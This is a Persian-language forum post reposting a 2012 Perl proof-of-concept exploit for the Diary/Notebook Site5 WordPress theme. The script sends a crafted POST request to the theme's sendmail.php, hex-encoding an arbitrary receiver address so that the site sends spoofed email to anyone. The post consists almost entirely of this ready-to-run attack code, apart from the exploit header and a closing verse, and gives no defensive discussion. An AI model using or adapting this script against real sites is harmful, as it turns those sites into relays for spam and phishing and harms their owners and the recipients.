SpareNet Servers Advertising & Link Exchange


هیچ اطلاعیه ای هنوز ایجاد نشده است .

سو استفاده در وردپرس

  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • سو استفاده در وردپرس

    # Exploit Title: Diary/Notebook Site5 Wordpress Theme - Email Spoofing
    # Date: 15.07.2012
    # Exploit Author: @bwallHatesTwits
    # Discovered by: @xxDigiPxx (
    # Software Link:
    # Vendor Homepage:
    # Others Possibly Vulnerable:
    # Version: Not Documented
    # Tested on: Linux 3.2
    use strict;
    use warnings;

    use LWP::UserAgent;
    use HTTP::Request::Common qw{ POST };

    #Change this to the root of the Wordpress
    my $wordpress = 'http://localhost/wordpress/';
    my $url = $wordpress.'wp-content/themes/diary/sendmail.php';

    #Name shows up in the topic of the email (Website contact message from name)
    my $name ='Proof of Concept';

    #Sender email address
    my $email = '[email protected]';

    #Content of the email
    my $comment = 'Email content';

    #Receiver email address
    my $receiver = '[email protected]';
    $receiver =~ s/(.)/sprintf("%x",ord($1))/eg;

    my $ua = LWP::UserAgent->new();
    my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] );
    print "Sending request to $url\n";
    my $content = $ua->request($request)->as_string();
    print $content;
    print "\nDone\nFollow \@BallastSec on Twitter\n";[/php]
    چو ایران نباشد تن من مباد
صبر کنید ..